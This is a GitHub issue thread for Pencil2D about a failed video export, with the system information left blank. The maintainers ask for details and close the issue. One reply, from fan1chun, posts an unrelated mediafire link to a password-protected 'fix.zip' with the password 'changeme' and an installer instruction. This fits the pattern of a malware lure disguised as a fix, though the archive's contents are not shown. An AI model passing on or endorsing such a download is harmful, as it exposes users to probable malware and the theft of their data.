### ISSUE TITLE
hie my video is not saving in pencil 2d.

### ISSUE THREAD

**Issue by MadavoA** [pencil2d/pencil#1876]
### System Information
+ Pencil2D Version:

 

+ Operating System:

 

+ RAM Size:

 

+ Graphics Tablet:

**Comment by MadavoA** [comment]
Unable to find a suitable output format

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MrStevns** [comment]
Please fill out the template information that we request.

As a minimum we need operation system and Pencil2D version.

**Comment by MrStevns** [comment]
Closing as this is still missing vital information.
